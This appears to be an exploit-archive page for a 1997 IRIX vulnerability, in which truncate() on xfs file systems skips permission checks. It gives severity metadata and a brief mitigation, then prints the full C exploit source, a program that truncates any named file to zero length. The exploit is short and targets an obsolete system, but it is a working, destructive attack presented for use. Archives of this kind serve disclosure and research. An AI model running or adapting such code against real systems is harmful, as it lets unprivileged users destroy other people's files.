Truncate System Call Vulnerability

vendor:

Operating System

by:

LAST STAGE OF DELIRIUM

7.2

CVSS

HIGH

Privilege Escalation

264

CWE

Product Name: Operating System

Affected Version From: 6.2

Affected Version To: 6.4

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

1997

Truncate System Call Vulnerability

The truncate() system call on a number of versions of the IRIX operating system (with the xfs file system) does not properly check permissions before truncating a file, making it possible for unprivileged users to damage files to which they would otherwise not have write access.

Mitigation:

Ensure that the truncate() system call is properly checking permissions before truncating a file.

Source

Exploit-DB raw data:

/*
source: https://www.securityfocus.com/bid/1540/info

The truncate() system call on a number of versions of the IRIX operating system (with the xfs file system) does not properly check permissions before truncating a file, making it possible for unprivileged users to damage files to which they would otherwise not have write access. Although only versions 6.2, 6.3, and 6.4 are listed as vulnerable other versions may exhibit this behaviour as well. 
*/

/*## copyright LAST STAGE OF DELIRIUM feb 1997 poland        *://lsd-pl.net/ #*/
/*## truncate                                                                #*/

/*   truncates any file on a xfs filesystem                                   */

main(int argc,char **argv){
    printf("copyright LAST STAGE OF DELIRIUM feb 1997 poland   //lsd-pl.net\n");
    printf("truncate for irix 6.2 6.3 6.4 IP:all\n\n");

    if(argc!=2){
        printf("usage: %s file\n",argv[0]);
        exit(-1);
    }

    if(!truncate(argv[1],0)) printf("file %s truncated\n",argv[1]);
    else perror("error");
}